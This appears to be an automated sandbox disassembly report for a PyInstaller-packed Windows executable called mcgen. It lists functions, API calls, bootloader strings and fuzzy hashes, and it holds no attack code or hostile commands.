Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
Instruction ID: 447ad0c857d12893f861ae050949b50043e070b3e72dfc6b881d56536d27eec7
Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
Instruction Fuzzy Hash: E38181B1B1C6A285EB20DF28D0507F933A8AF457A6F448031EB8DC7785DE3CE5858781

Function 00007FF6B9F11600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6B9F116DA
Failed to create symbolic link %s!, xrefs: 00007FF6B9F11622
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6B9F117DF
Failed to extract %s: failed to open target file!, xrefs: 00007FF6B9F1165C
fopen, xrefs: 00007FF6B9F11663
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6B9F116A2
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF6B9F11742
fseek, xrefs: 00007FF6B9F116E1
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6B9F117CA
malloc, xrefs: 00007FF6B9F11749
fread, xrefs: 00007FF6B9F117E6
fwrite, xrefs: 00007FF6B9F117D1

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: 4e7c6c2bdf537de82cf47b22606b231cd0750e3a63fce0541248225687b17467
Instruction ID: c8236246949059d36c82b7279de58d7fef7d326597f3a9475a33e638c7caa2cb
Opcode Fuzzy Hash: 4e7c6c2bdf537de82cf47b22606b231cd0750e3a63fce0541248225687b17467
Instruction Fuzzy Hash: CF51B2A1F0C66382EA209F6994101B96358BF867B6F448531EF1C877D2DF3CE555C781

Function 00007FF6B9F18850 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathW.KERNEL32(?,?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F188F4
GetCurrentProcessId.KERNEL32(?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F188FA
CreateDirectoryW.KERNELBASE(?,00000000,00007FF6B9F13CBB), ref: 00007FF6B9F1893C

Part of subcall function 00007FF6B9F18A20: GetEnvironmentVariableW.KERNEL32(00007FF6B9F1388E), ref: 00007FF6B9F18A57
Part of subcall function 00007FF6B9F18A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6B9F18A79

Part of subcall function 00007FF6B9F282A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F282C1

Part of subcall function 00007FF6B9F12810: MessageBoxW.USER32 ref: 00007FF6B9F128EA

Strings

LOADER: failed to set the TMP environment variable., xrefs: 00007FF6B9F188CC
_MEI%d, xrefs: 00007FF6B9F18902
LOADER: length of teporary directory path exceeds maximum path length!, xrefs: 00007FF6B9F1896E
TMP, xrefs: 00007FF6B9F188B2
TMP, xrefs: 00007FF6B9F1888C, 00007FF6B9F18993

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
API String ID: 3563477958-1339014028
Opcode ID: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction ID: 08d95059d384f1dc1ffd40cb67bfd88232592b8b03630c9a4a9baf1b395c565b
Opcode Fuzzy Hash: e7f7d737786deb8485312a2eb98f4769331debcd6954f8bf1608d04e150fa3ce
Instruction Fuzzy Hash: D041C651A1C67240FA20AF6DA5512F92299AF8ABF2F804131EF0DC77D6DE3CE505C781

Function 00007FF6B9F11210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6B9F112BA
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6B9F112EF
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6B9F1141E
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6B9F11276
malloc, xrefs: 00007FF6B9F112C1, 00007FF6B9F112F6
1.3.1, xrefs: 00007FF6B9F11249

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
Instruction ID: 330fa6b6658db6d64631149d41d55a437fdb89db0e66f1d1ee3f65118d593694
Opcode Fuzzy Hash: dd90a4479ba71e44dedb97b9a062242b20196015a5516087af12020732465272
Instruction Fuzzy Hash: 8C51E662B0C6A281E6609F29A4103BA6299FF87BB6F548135EF4DC77C5EE3CE505C740

Function 00007FF6B9F2ED80 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(?,?,?,00007FF6B9F2F11A,?,?,-00000018,00007FF6B9F2ADC3,?,?,?,00007FF6B9F2ACBA,?,?,?,00007FF6B9F25FAE), ref: 00007FF6B9F2EEFC
GetProcAddress.KERNEL32(?,?,?,00007FF6B9F2F11A,?,?,-00000018,00007FF6B9F2ADC3,?,?,?,00007FF6B9F2ACBA,?,?,?,00007FF6B9F25FAE), ref: 00007FF6B9F2EF08

Strings

api-ms-, xrefs: 00007FF6B9F2EE46
ext-ms-, xrefs: 00007FF6B9F2EE59

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction ID: 01129e6867d5e58b02c193f84b30a1d13ab4ce8e40ec653a1785b57dd90c329d
Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
Instruction Fuzzy Hash: 26410161B19A5241FB15CF2E9904675369ABF49BF2F994139EE1DCB388EE3CE8058300

Function 00007FF6B9F136B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6B9F13804), ref: 00007FF6B9F136E1
GetLastError.KERNEL32(?,00007FF6B9F13804), ref: 00007FF6B9F136EB

Part of subcall function 00007FF6B9F12C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12C9E
Part of subcall function 00007FF6B9F12C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6B9F13706,?,00007FF6B9F13804), ref: 00007FF6B9F12D63
Part of subcall function 00007FF6B9F12C50: MessageBoxW.USER32 ref: 00007FF6B9F12D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6B9F13790
Failed to obtain executable path., xrefs: 00007FF6B9F136F3
GetModuleFileNameW, xrefs: 00007FF6B9F136FA
\\?\, xrefs: 00007FF6B9F1375A
Failed to resolve full path to executable %ls., xrefs: 00007FF6B9F13739

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: 66d2bff721cb20cebdc84adb3389e39dd3063f5024206ae34d429bcf1d9c56b2
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: 0121A391B0C66282FA209F29E8113F62258BF493B6F400132EB6DC35D5FE2CE105C780

Function 00007FF6B9F2BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F2BEF9

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction ID: 006d3b17d3005e9c32159ea4518cdc4d90242bfb02967135a42b359d5e478e6f
Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
Instruction Fuzzy Hash: 0CC1AF22A1CAC681E7609F2994403BD7768EB82BE3F554139FF5E877A1CE7CE8458701

Function 00007FF6B9F18760 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF6B9F18780
OpenProcessToken.ADVAPI32 ref: 00007FF6B9F18793
GetTokenInformation.KERNELBASE ref: 00007FF6B9F187B8
GetLastError.KERNEL32 ref: 00007FF6B9F187C2
GetTokenInformation.KERNELBASE ref: 00007FF6B9F18802
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B9F1881E
CloseHandle.KERNEL32 ref: 00007FF6B9F18836

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction ID: e5e393c5b6aaa566d742854ba3eba78af2840cd0d96bb494e08d329af3ab0fce
Opcode Fuzzy Hash: 960e55689f8153c2b27b80b9ea7c16c7327bf886aabdd5ec5ebc892c06a11a30
Instruction Fuzzy Hash: 8A217171A0C65242EB109F69F55027AA7A9FB867B2F100235EB6C83AE8DF7CD4548740

Function 00007FF6B9F190E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6B9F18760: GetCurrentProcess.KERNEL32 ref: 00007FF6B9F18780
Part of subcall function 00007FF6B9F18760: OpenProcessToken.ADVAPI32 ref: 00007FF6B9F18793
Part of subcall function 00007FF6B9F18760: GetTokenInformation.KERNELBASE ref: 00007FF6B9F187B8
Part of subcall function 00007FF6B9F18760: GetLastError.KERNEL32 ref: 00007FF6B9F187C2
Part of subcall function 00007FF6B9F18760: GetTokenInformation.KERNELBASE ref: 00007FF6B9F18802
Part of subcall function 00007FF6B9F18760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6B9F1881E
Part of subcall function 00007FF6B9F18760: CloseHandle.KERNEL32 ref: 00007FF6B9F18836

LocalFree.KERNEL32(?,00007FF6B9F13C55), ref: 00007FF6B9F1916C
LocalFree.KERNEL32(?,00007FF6B9F13C55), ref: 00007FF6B9F19175

Strings

D:(A;;FA;;;%s), xrefs: 00007FF6B9F19157
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF6B9F19183
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF6B9F19142
S-1-3-4, xrefs: 00007FF6B9F19121

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction ID: d21f65af5ac422a8266dc68c37f508020073286cb1b907954773a6f0d236fd54
Opcode Fuzzy Hash: 3eb7115bd34229e0b110e4578eeeb93c66e7230f7a251aed45e8d0dbb8b27e08
Instruction Fuzzy Hash: 69216D61A0C76281FB14AF24E9153EA6368EF897A2F440031EB4DD3796DF3CD8858780

Function 00007FF6B9F2CFD0 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B9F2CFBB), ref: 00007FF6B9F2D0EC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B9F2CFBB), ref: 00007FF6B9F2D177

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction ID: 4ceccccb4b6f0c78e09fc8c489e31ba53df299d7466475943cdc1dc21d1b1f5b
Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
Instruction Fuzzy Hash: 2891B132E1869285F760DF6D94403BD3BA8AB44BAAF144139EF4E97A95CE3CD44AC710

Function 00007FF6B9F25698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F256C5
CreateFileW.KERNELBASE ref: 00007FF6B9F25704
CloseHandle.KERNEL32 ref: 00007FF6B9F25739

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction ID: 0a18c75c7b648be4f78a5a94379fe045307c668ac10f5f9a00a1bfae0c14b26a
Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
Instruction Fuzzy Hash: 04417922E2878283E7509F2595543797264FB947B5F109335EBA883AD2EF7CA5A08740

Function 00007FF6B9F1CCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6B9F1CE7C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6B9F1CE90

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6B9F1CCD0
__scrt_release_startup_lock.LIBCMT ref: 00007FF6B9F1CD3E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6B9F1CD91

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction ID: e07bbe44bbcd619e33119239165f330ff4d5713537b61c95606d1ff58c628ffb
Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
Instruction Fuzzy Hash: 02318CA0E0C27341FA24AF3ED4213B92799AF423A7F444438EB5DC72D7DE2CA445C291

Function 00007FF6B9F29AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF6B9F29A9C), ref: 00007FF6B9F29AB1
TerminateProcess.KERNEL32(?,?,?,00007FF6B9F29A9C), ref: 00007FF6B9F29ABC
ExitProcess.KERNEL32 ref: 00007FF6B9F29ACB

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction ID: 5fd24e318f456611d70b626a693a3268bd3db6405763536387ce25c19abf1abb
Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
Instruction Fuzzy Hash: 4FD09E14B0C78A42EB283F785DA91782259EF48BB3F141438DA0FC7393DD7DA4894701

Function 00007FF6B9F201AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F201F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6B9F202E7

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction ID: 1c19b1c5e198bacb9f7f8c0ebac55ad066965f868dc763c4b3034f1f8a7cbc30
Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
Instruction Fuzzy Hash: E751C663A092C146E6689E6D940077A7299EF46BB6F184635FF6D877C5CF3CD4018601

Function 00007FF6B9F2C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF6B9F2C33D), ref: 00007FF6B9F2C1F0
GetLastError.KERNEL32(?,?,?,?,?,00007FF6B9F2C33D), ref: 00007FF6B9F2C1FA

Memory Dump Source

Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true

Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
